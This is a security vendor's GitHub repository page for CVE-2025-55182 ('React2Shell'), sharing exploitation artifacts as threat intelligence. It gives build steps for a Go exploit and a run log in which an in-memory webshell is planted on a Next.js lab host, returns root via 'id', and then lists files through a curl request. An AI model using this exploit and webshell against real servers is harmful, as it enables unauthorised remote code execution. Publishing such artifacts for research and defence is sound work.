Skip to content

vulncheck-oss/cve-2025-55182

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

1 Commit
inmem-webshell
inmem-webshell
 
 
.gitignore
.gitignore
 
 
.golangci.yml
.golangci.yml
 
 
LICENSE
LICENSE
 
 
README.md
README.md
 
 

Repository files navigation

CVE-2025-55182: Exploitation Artifacts

An export of a small subset of the VulnCheck Initial Access Intelligence artifacts for the CVE-2025-55182 React2Shell vulnerability. Some of the teams observations on these artifacts can be read in the blog post.

Index

Building

All components are built from our exploit framework go-exploit. Each directory contains a copy of the interesting artifact.

If you have a Go build environment handy with golangci-lint and GNU make, you can use make:

$ make
gofmt -d -w cve-2025-55182.go
golangci-lint run --fix --timeout 3m cve-2025-55182.go
0 issues.
GOOS=linux GOARCH=amd64 go build  -o build/cve-2025-55182_linux-amd64 cve-2025-55182.go

To build the exploit into a docker image simply:

make docker

In-Memory NextJS Webshell

This is an implementation of an in memory webshell against next.js using React2Shell. We first saw this demonstrated here. The webshell is randomized on each new attack.

poptart@grimm $ ./build/cve-2025-55182_linux-amd64 -rhost 172.17.0.1 -rport 3000 -e
time=2025-12-08T15:28:06.892-07:00 level=STATUS msg="Starting target" index=0 host=172.17.0.1 port=3000 ssl=false "ssl auto"=false
time=2025-12-08T15:28:06.892-07:00 level=STATUS msg="Generating webshell payload"
time=2025-12-08T15:28:06.893-07:00 level=STATUS msg="Uploading webshell to target"
time=2025-12-08T15:28:16.902-07:00 level=ERROR msg="HTTP request error: Post \"http://172.17.0.1:3000/\": context deadline exceeded (Client.Timeout exceeded while awaiting headers)"
time=2025-12-08T15:28:16.902-07:00 level=SUCCESS msg="Webshell installed!" location=http://172.17.0.1:3000/UByGoR
time=2025-12-08T15:28:16.902-07:00 level=STATUS msg="Testing `id`" testurl="http://172.17.0.1:3000/UByGoR?z=id"
time=2025-12-08T15:28:16.917-07:00 level=SUCCESS msg="uid=0(root) gid=0(root) groups=0(root)\n"
time=2025-12-08T15:28:16.917-07:00 level=SUCCESS msg="Exploit successfully completed" exploited=true
poptart@grimm $ curl http://172.17.0.1:3000/UByGoR?z=ls%20-l
total 72
-rw-r--r--   1 root root     77 Dec  4 23:41 jsconfig.json
-rw-r--r--   1 root root     92 Dec  4 23:41 next.config.mjs
drwxr-xr-x 172 root root    173 Dec  4 23:41 node_modules
-rw-r--r--   1 root root  16384 Dec  4 23:41 notes.db
-rw-r--r--   1 root root 123663 Dec  4 23:41 package-lock.json
-rw-r--r--   1 root root    467 Dec  4 23:41 package.json
-rw-r--r--   1 root root   6028 Dec  4 23:41 seed.sql
drwxr-xr-x   3 root root      3 Dec  4 23:41 src

About

VulnCheck CVE-2025-55182 react2shell

Resources

Readme

License

Apache-2.0 license
Activity
Custom properties

Stars

2 stars

Watchers

0 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

 
 
 

Contributors

Languages